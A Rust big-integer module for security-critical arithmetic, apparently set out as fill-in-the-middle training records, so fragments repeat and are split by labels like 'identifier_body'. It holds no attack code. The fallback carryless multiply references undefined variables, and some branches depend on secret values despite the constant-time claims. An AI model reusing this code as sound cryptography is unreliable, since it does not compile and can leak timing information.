let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
}
| {
out = Ordering::Equal;
} | conditional_block |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
}
/// Computes the quotient and remainder of 'self / rhs'.
///
/// Any mixture of input bit_widths is supported.
/// Internally this uses binary long division.
///
/// NOTE: This is very slow and should be avoided if possible.
///
/// Returns a tuple of '(self / rhs, self % rhs)' where the quotient is the
/// same width as 'self' and the remainder is the same width as 'rhs'.
fn quorem(&self, rhs: &Self) -> (Self, Self) {
let mut q = Self::from_usize(0, self.bit_width()); // Range is [0, Self]
let mut r = Self::from_usize(0, rhs.bit_width()); // Range is [0, rhs).
// TODO: Implement a bit iterator so set_bit requires less work.
for i in (0..self.bit_width()).rev() {
let carry = r.shl();
r.set_bit(0, self.bit(i));
let mut next_r = Self::from_usize(0, rhs.bit_width());
// If there is a carry, then we know that r might be > rhs when the shl also has
// a carry.
let carry2 = r.overflowing_sub_to(rhs, &mut next_r);
let subtract = (carry != 0) == carry2;
next_r.copy_if(subtract, &mut r);
q.set_bit(i, if subtract { 1 } else { 0 });
}
(q, r)
}
fn value_bits(&self) -> usize {
for i in (0..self.value.len()).rev() {
let zeros = self.value[i].leading_zeros() as usize;
if zeros == BASE_BITS {
continue;
}
return (i * BASE_BITS) + (BASE_BITS - zeros);
}
0
}
fn bit_width(&self) -> usize {
self.value.len() * BASE_BITS
}
}
impl SecureBigUint {
pub fn byte_width(&self) -> usize {
self.value.len() * BASE_BYTES
}
/// Multiplies two numbers and adds their result to the out number.
/// out += self*rhs
pub(super) fn add_mul_to(&self, rhs: &Self, out: &mut Self) {
let a = &self.value[..];
let b = &rhs.value[..];
for i in 0..a.len() {
let mut carry = 0;
for j in 0..b.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((a[i] as u64) * (b[j] as u64)) + (out.value[i + j] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as u32;
}
for k in (i + b.len())..out.value.len() {
let tmp = (out.value[k] as u64) + carry;
carry = tmp >> BASE_BITS;
out.value[k] = tmp as u32;
}
}
}
/// Copies 'self' to 'out' if should_copy is true. In all cases, this takes
/// a constant amount of time to execute.
///
/// NOTE: 'self' and 'out' must have the same bit_width().
#[inline(never)]
pub fn copy_if(&self, should_copy: bool, out: &mut Self) {
assert_eq!(self.value.len(), out.value.len());
// Will be 0b111...111 if should_copy else 0.
let self_mask = (!(should_copy as BaseType)).wrapping_add(1);
let out_mask = !self_mask;
for (self_v, out_v) in self.value.iter().zip(out.value.iter_mut()) {
*out_v = (*self_v & self_mask).wrapping_add(*out_v & out_mask);
}
}
/// Swaps the contents of 'self' and 'other' if 'should_swap' is true.
///
/// The actual values of both integers are swapped rather than swapping any
/// internal memory pointers so that 'should_swap' can not be inferred from
/// the memory locations of the final integers.
///
/// At a given integer bit_width, this should always take the same amount of
/// CPU cycles to execute.
#[inline(never)]
pub fn swap_if(&mut self, other: &mut Self, should_swap: bool) {
assert_eq!(self.value.len(), other.value.len());
// Will be 0b111...111 if should_swap else 0.
let mask = (!(should_swap as BaseType)).wrapping_add(1);
for (self_v, other_v) in self.value.iter_mut().zip(other.value.iter_mut()) {
// Will be 0 if we don't want to swap.
let filter = mask & (*self_v ^ *other_v);
*self_v ^= filter;
*other_v ^= filter;
}
}
/// In-place reverses all the order of all bits in this integer.
pub fn reverse_bits(&mut self) {
let mid = (self.value.len() + 1) / 2;
for i in 0..mid {
let j = self.value.len() - 1 - i;
// Swap if we are not at the middle limb (only relevant if we have an odd number
// of limbs).
if i != j {
self.value.swap(i, j);
self.value[j] = self.value[j].reverse_bits();
}
self.value[i] = self.value[i].reverse_bits();
}
}
/// Performs 'self ^= rhs' only if 'should_apply' is true.
pub fn xor_assign_if(&mut self, should_apply: bool, rhs: &Self) {
assert_eq!(self.value.len(), rhs.value.len());
// Will be 0b111...111 if should_apply else 0.
let mask = (!(should_apply as BaseType)).wrapping_add(1);
for i in 0..self.value.len() {
self.value[i] ^= rhs.value[i] & mask;
}
}
pub fn discard(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
self.value.truncate(n);
}
///
pub fn truncate(&mut self, bit_width: usize) {
let n = ceil_div(bit_width, BASE_BITS);
// TODO: Also zero out any high bits
for i in n..self.value.len() {
assert_eq!(self.value[i], 0);
}
self.value.truncate(n);
}
/// Computes 2^n more efficiently than using pow().
/// Only supports exponents smaller than u32.
/// TODO: Just take as input a u32 directly.
pub fn exp2(n: u32, bit_width: usize) -> Self {
let mut out = Self::from_usize(0, bit_width);
out.set_bit(n as usize, 1);
out
}
pub fn is_zero(&self) -> bool {
let mut is = true;
for v in &self.value {
is &= *v == 0;
}
is
}
/// TODO: Improve the constant time behavior of this.
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
pub(super) fn overflowing_sub_assign(&mut self, rhs: &Self) -> bool {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
// rhs is allowed to be narrower than self
let r_i = if i < rhs.value.len() { rhs.value[i] } else { 0 };
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (self.value[i] as i64) - (r_i as i64) + carry;
if v < 0 {
self.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
self.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
pub(super) fn overflowing_sub_to(&self, rhs: &Self, out: &mut Self) -> bool {
let mut carry = 0;
let n = out.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
// TODO: Try to use overflowing_sub instead (that way we don't need to go to
// 64bits)
let v = (a as i64) - (b as i64) + carry;
if v < 0 {
out.value[i] = (v + (u32::max_value() as i64) + 1) as u32;
carry = -1;
} else {
out.value[i] = v as u32;
carry = 0;
}
}
carry != 0
}
/// Performs modular reduction using up to one subtraction of the modulus
/// from the value.
///
/// Will panic if 'self' was >= 2*modulus
pub fn reduce_once(&mut self, modulus: &Self) {
let mut reduced = Self::from_usize(0, self.bit_width());
let overflow = self.overflowing_sub_to(modulus, &mut reduced);
reduced.copy_if(!overflow, self);
self.truncate(modulus.bit_width());
}
#[must_use]
pub fn shl(&mut self) -> BaseType {
let mut carry = 0;
for v in self.value.iter_mut() {
let (new_v, _) = v.overflowing_shl(1);
let new_carry = *v >> 31;
*v = new_v | carry;
carry = new_carry;
}
carry
}
pub fn shr(&mut self) {
let mut carry = 0;
for v in self.value.iter_mut().rev() {
let (new_v, _) = v.overflowing_shr(1);
let new_carry = *v & 1;
*v = new_v | (carry << 31);
carry = new_carry;
}
}
/// Computes 'self >>= n'
/// NOTE: We assume that 'n' is a publicly known constant.
pub fn shr_n(&mut self, n: usize) {
let byte_shift = n / BASE_BITS;
let carry_size = n % BASE_BITS;
let carry_mask = ((1 as BaseType) << carry_size).wrapping_sub(1);
for i in 0..self.value.len() {
let v = self.value[i];
self.value[i] = 0;
if i < byte_shift {
continue;
}
let j = i - byte_shift;
self.value[j] = v >> carry_size;
if carry_size != 0 && j > 0 {
let carry = v & carry_mask;
self.value[j - 1] |= carry << (BASE_BITS - carry_size);
}
}
}
/// Computes self >>= BASE_BITS.
pub(super) fn shr_base(&mut self) {
assert_eq!(self.value[0], 0);
for j in 1..self.value.len() {
self.value[j - 1] = self.value[j];
}
let k = self.value.len();
self.value[k - 1] = 0;
}
pub fn and_assign(&mut self, rhs: &Self) {
for i in 0..self.value.len() {
self.value[i] &= rhs.value[i];
}
}
/// Efficienctly (in O(1) time) computes 'self % 2^32'
pub fn mod_word(&self) -> u32 {
if self.value.len() == 0 {
0
} else {
self.value[0]
}
}
// TODO: Need a version of this using pmull in aarch64 (vmull_p64)
/// Interprates this integer and 'rhs' as polynomials over GF(2^n) and
/// multiplies them into 'out'.
///
/// Operations in this field:
/// - Addition is XOR
/// - Multiplication is AND
#[cfg(all(target_arch = "x86_64", target_feature = "pclmulqdq"))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
use crate::intrinsics::*;
use core::arch::x86_64::_mm_clmulepi64_si128;
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..self.value.len() {
let a = u64_to_m128i(self.value[i] as u64);
for j in 0..rhs.value.len() {
let b = u64_to_m128i(rhs.value[j] as u64);
let r = u64_from_m128i(unsafe { _mm_clmulepi64_si128(a, b, 0) });
let rl = r as u32;
let rh = (r >> 32) as u32;
// Add to output
out.value[i + j] ^= rl;
out.value[i + j + 1] ^= rh;
}
}
}
// TODO: Finish making this constant time and correct.
#[cfg(not(all(target_arch = "x86_64", target_feature = "pclmulqdq")))]
pub fn carryless_mul_to(&self, rhs: &Self, out: &mut Self) {
assert!(out.bit_width() >= self.bit_width() + rhs.bit_width() - 1);
out.assign_zero();
for i in 0..b.value_bits() {
out.xor_assign_if(b.bit(i) == 1, &a);
a.shl();
}
}
// TODO: Move to a shared utility.
pub fn to_string_radix(&self, radix: u32) -> alloc::string::String {
// TODO: These should be global constants (as well as one)
let zero = Self::from_usize(0, self.bit_width());
let div = Self::from_usize(radix as usize, 32);
let mut s = alloc::string::String::new();
let mut tmp = self.clone();
while tmp > zero {
// TODO: We can divide by a larger power of 10 to make this more efficient.
let (q, r) = tmp.quorem(&div);
tmp = q;
// TODO: Very inefficient
s.insert(
0,
core::char::from_digit(r.value.first().cloned().unwrap_or(0), radix).unwrap(),
);
}
if s.len() == 0 {
s.push('0');
}
s
}
/// Resets the value of the integer to 0.
pub fn assign_zero(&mut self) |
/// In-place increases the size
pub fn extend(&mut self, bit_width: usize) {
let new_len = ceil_div(bit_width, BASE_BITS);
assert!(new_len >= self.value.len());
self.value.resize(new_len, 0);
}
pub fn from_str(s: &str, bit_width: usize) -> common::errors::Result<Self> {
let ten = SecureBigUint::from_usize(10, 32);
let mut out = Self::from_usize(0, bit_width);
for c in s.chars() {
let digit = c
.to_digit(10)
.ok_or(common::errors::err_msg("Invalid digit"))?;
let tmp = out.clone();
ten.mul_to(&tmp, &mut out);
out += SecureBigUint::from_usize(digit as usize, bit_width);
// out = (&out * &ten) + &(digit as usize).into();
}
Ok(out)
}
}
impl core::fmt::Display for SecureBigUint {
fn fmt(&self, f: &mut core::fmt::Formatter<'_>) -> core::fmt::Result {
write!(f, "{}", self.to_string_radix(10))
}
}
impl Ord for SecureBigUint {
fn cmp(&self, other: &Self) -> Ordering {
let mut less = 0;
let mut greater = 0;
let n = core::cmp::max(self.value.len(), other.value.len());
for i in (0..n).rev() {
let mask = !(less | greater);
let a = self.value.get(i).cloned().unwrap_or(0);
let b = other.value.get(i).cloned().unwrap_or(0);
if a < b {
less |= mask & 1;
} else if a > b {
greater |= mask & 1;
}
}
let cmp = (less << 1) | greater;
let mut out = Ordering::Equal;
// Exactly one of these if statements should always be triggered.
if cmp == 0b10 {
out = Ordering::Less;
}
if cmp == 0b01 {
out = Ordering::Greater;
}
if cmp == 0b00 {
out = Ordering::Equal;
}
out
}
}
impl PartialEq for SecureBigUint {
fn eq(&self, other: &Self) -> bool {
self.cmp(other) == Ordering::Equal
}
}
impl Eq for SecureBigUint {}
impl PartialOrd for SecureBigUint {
fn partial_cmp(&self, other: &Self) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl_op_ex!(+= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::add_assign(lhs, rhs)
});
impl_op_commutative!(+ |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
// NOTE: Does not use add_into to avoid risking an overflow.
Integer::add(&lhs, rhs)
});
impl_op!(+ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
Integer::add(lhs, rhs)
});
impl_op_ex!(-= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
Integer::sub_assign(lhs, rhs)
});
impl_op_ex!(-|lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { lhs.sub_into(rhs) });
impl_op!(-|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::sub(lhs, rhs) });
impl_op_ex!(
*|lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint { Integer::mul(lhs, rhs) }
);
impl_op_ex!(/ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (q, _) = lhs.quorem(rhs);
q
});
impl_op!(% |lhs: SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op!(% |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
let (_, r) = lhs.quorem(rhs);
r
});
impl_op_ex!(^= |lhs: &mut SecureBigUint, rhs: &SecureBigUint| {
assert_eq!(lhs.value.len(), rhs.value.len());
for (lhs_value, rhs_value) in lhs.value.iter_mut().zip(rhs.value.iter()) {
*lhs_value ^= *rhs_value;
}
});
impl_op_ex!(^ |lhs: &SecureBigUint, rhs: &SecureBigUint| -> SecureBigUint {
assert_eq!(lhs.value.len(), rhs.value.len());
let mut out = SecureBigUint::from_usize(0, lhs.bit_width());
for i in 0..out.value.len() {
out.value[i] = lhs.value[i] ^ rhs.value[i];
}
out
});
#[cfg(test)]
mod tests {
use super::*;
use core::str::FromStr;
#[test]
fn secure_biguint_test() {
// TODO: Check multiplication in x*0 and x*1 cases
let seven = SecureBigUint::from_usize(7, 64);
let one_hundred = SecureBigUint::from_usize(100, 64);
assert!(one_hundred > seven);
assert!(seven < one_hundred);
assert!(one_hundred == one_hundred);
assert!(seven == seven);
let mut seven_hundred = SecureBigUint::from_usize(0, 64);
seven.mul_to(&one_hundred, &mut seven_hundred);
assert!(seven_hundred == SecureBigUint::from_usize(700, 64));
let x = SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff]);
let mut temp = SecureBigUint::from_usize(0, 64);
x.mul_to(&x, &mut temp);
assert_eq!(
&temp.to_le_bytes(),
&(core::u32::MAX as u64).pow(2).to_le_bytes()
);
let (q, r) = temp.quorem(&x);
// Equal to 'x' extended to 64 bits
assert!(q == SecureBigUint::from_le_bytes(&[0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0]));
assert!(r == SecureBigUint::from_usize(0, 32));
let (q, r) = one_hundred.quorem(&seven);
assert!(q == SecureBigUint::from_usize(14, 64));
assert!(r == SecureBigUint::from_usize(2, 64));
let (q, r) = seven.quorem(&one_hundred);
assert!(q == SecureBigUint::from_usize(0, 64));
assert!(r == SecureBigUint::from_usize(7, 64));
// TODO: Test larger numbers.
}
#[test]
fn shr_n_test() {
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0b00001010, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0]);
v.shr_n(8);
assert_eq!(&v.to_be_bytes(), &[0, 0b00010100, 0, 0]);
}
// Testing moving values across bases.
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(32);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00010100, 0, 0, 0]);
}
{
let mut v = SecureBigUint::from_be_bytes(&[0b00010100, 0, 0, 0, 0, 0, 0, 0]);
v.shr_n(34);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b00000101, 0, 0, 0]);
}
// Carry to second base.
{
let mut v = SecureBigUint::from_be_bytes(&[0, 0, 0, 1, 0, 0, 0, 0]);
v.shr_n(1);
assert_eq!(&v.to_be_bytes(), &[0, 0, 0, 0, 0b10000000, 0, 0, 0]);
}
}
}
| {
for v in self.value.iter_mut() {
*v = 0;
}
} | identifier_body |
uint.rs | use alloc::vec::Vec;
use common::ceil_div;
use core::cmp::Ord;
use core::cmp::Ordering;
use core::marker::PhantomData;
use core::ops;
use core::ops::Div;
use core::ops::Index;
use core::ops::IndexMut;
use generic_array::{arr::AddLength, ArrayLength, GenericArray};
use typenum::Quot;
use typenum::{Prod, U32};
use crate::integer::Integer;
use crate::matrix::dimension::*;
use crate::number::{One, Zero};
/*
pub trait StorageType<D: Dimension>:
Clone + AsRef<[u32]> + AsMut<[u32]> + Index<usize, Output = u32> + IndexMut<usize, Output = u32>
{
/// Allocates a new buffer with at least 'words' number of items.
fn alloc(words: usize) -> Self;
}
impl StorageType<Dynamic> for Vec<u32> {
fn alloc(words: usize) -> Self {
vec![0; words]
}
}
*/
pub(super) type BaseType = u32;
pub(super) const BASE_BITS: usize = 32;
const BASE_BYTES: usize = core::mem::size_of::<BaseType>();
const BITS_PER_BYTE: usize = 8;
/// Big unsigned integer implementation intended for security critical
/// use-cases.
///
/// Internally each instance stores a fixed size storage buffer based on the bit
/// width used to initialize the integer. All numerical operations are constant
/// time for a given storage buffer size unless otherwise specified. This means
/// that we assume that the buffer widths are publicly known and don't vary with
/// the value of the integer.
///
/// Special care must be taken to ensure that the width of integers generated by
/// operations is kept under control:
/// - Addition (a + b) will output integers with space for one extra carry bit.
/// - Multiplication (a*b) will output integers with double the space.
/// - Operations like quorem (a % b) or truncate can be used to re-contrain the
/// width of integers.
#[derive(Clone, Debug)]
pub struct SecureBigUint {
/// In little endian 32bits at a time.
/// Will be padded with
///
/// TODO: We can make this an enum to support passing in '&mut [BaseType]'
pub(super) value: Vec<BaseType>,
}
impl SecureBigUint {
/// Creates an integer from a small value that fits within a usize. The
/// buffer used to store this number will be able to store at least 'width'
/// bits.
pub fn from_usize(value: usize, width: usize) -> Self {
let mut data = vec![0; ceil_div(width, BASE_BITS)];
data[0] = value as BaseType;
Self { value: data }
}
}
impl Integer for SecureBigUint {
/// Creates an integer from little endian bytes representing the number.
///
/// The width of the integer is inferred from data.len().
/// The caller is responsible for ensuring that data.len() is a well known
/// constant.
fn from_le_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_le_bytes(*array_ref![data, BASE_BYTES * i, BASE_BYTES]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[0..rem].copy_from_slice(&data[(data.len() - rem)..]);
out.value[n] = BaseType::from_le_bytes(rest);
}
out
}
/// Converts the integer to little endian bytes.
///
/// NOTE: This may have zero significant padding depending on the internal
/// representation.
fn to_le_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * BASE_BYTES);
for v in &self.value {
data.extend_from_slice(&v.to_le_bytes());
}
data
}
fn from_be_bytes(data: &[u8]) -> Self {
let mut out = Self::from_usize(0, BITS_PER_BYTE * data.len());
let n = data.len() / BASE_BYTES;
for i in 0..(data.len() / BASE_BYTES) {
out.value[i] = BaseType::from_be_bytes(*array_ref![
data,
data.len() - (BASE_BYTES * (i + 1)),
BASE_BYTES
]);
}
let rem = data.len() % BASE_BYTES;
if rem != 0 {
let mut rest = [0u8; BASE_BYTES];
rest[(BASE_BYTES - rem)..].copy_from_slice(&data[0..rem]);
out.value[n] = BaseType::from_be_bytes(rest);
}
out
}
fn to_be_bytes(&self) -> Vec<u8> {
let mut data = vec![];
data.reserve_exact(self.value.len() * 4);
for v in self.value.iter().rev() {
data.extend_from_slice(&v.to_be_bytes());
}
data
}
/// Computes and returns 'self + rhs'. The output buffer will be 1 bit
/// larger than the inputs to accomadate possible overflow.
fn add(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, core::cmp::max(self.bit_width(), rhs.bit_width()) + 1);
self.add_to(rhs, &mut out);
out
}
/// Computes 'output = self + rhs'. It is the user's responsibility to
/// ensure that the
fn add_to(&self, rhs: &Self, output: &mut Self) {
assert!(output.value.len() >= self.value.len());
assert!(output.value.len() >= rhs.value.len());
let mut carry = 0;
// TODO: Always loop through max(self, rhs, output) length so we know for sure
// that all carries are handled.
let n = output.value.len();
for i in 0..n {
let a = self.value.get(i).cloned().unwrap_or(0);
let b = rhs.value.get(i).cloned().unwrap_or(0);
let v = (a as u64) + (b as u64) + carry;
output.value[i] = v as BaseType;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
/// Computes 'self += rhs'.
fn add_assign(&mut self, rhs: &Self) {
let mut carry = 0;
let n = self.value.len();
for i in 0..n {
let v = (self.value[i] as u64) + (rhs.value[i] as u64) + carry;
self.value[i] = v as u32;
carry = v >> 32;
}
assert_eq!(carry, 0);
}
fn sub(&self, rhs: &Self) -> Self {
let mut out = self.clone();
out.sub_assign(rhs);
out
}
/// It would be useful to have a conditional form of this that adds like
/// subtraction by zero.
fn sub_assign(&mut self, rhs: &Self) {
assert!(!self.overflowing_sub_assign(rhs));
}
fn mul(&self, rhs: &Self) -> Self {
let mut out = Self::from_usize(0, self.bit_width() + rhs.bit_width());
self.mul_to(rhs, &mut out);
out
}
/// O(n^2) multiplication. Assumes that u64*u64 multiplication is always
/// constant time.
///
/// 'out' must be twice the size of
fn mul_to(&self, rhs: &Self, out: &mut Self) {
out.assign_zero();
let mut overflowed = false;
for i in 0..self.value.len() {
let mut carry = 0;
for j in 0..rhs.value.len() {
// TODO: Ensure this uses the UMAAL instruction on ARM
let tmp = ((self.value[i] as u64) * (rhs.value[j] as u64))
+ (out.value[i + j] as u64)
+ carry;
carry = tmp >> BASE_BITS;
out.value[i + j] = tmp as BaseType;
}
// assert!(carry <= u32::max_value() as u64);
if i + rhs.value.len() < out.value.len() {
out.value[i + rhs.value.len()] = carry as BaseType;
} else {
overflowed |= carry != 0;
}
}
assert!(!overflowed);
}
fn bit(&self, i: usize) -> usize {
((self.value[i / BASE_BITS] >> (i % BASE_BITS)) & 0b01) as usize
}
fn set_bit(&mut self, i: usize, v: usize) {
assert!(v == 0 || v == 1);
let ii = i / BASE_BITS;
let shift = i % BASE_BITS;
let mask = !(1 << shift);
self.value[ii] = (self.value[ii] & mask) | ((v as BaseType) << shift);
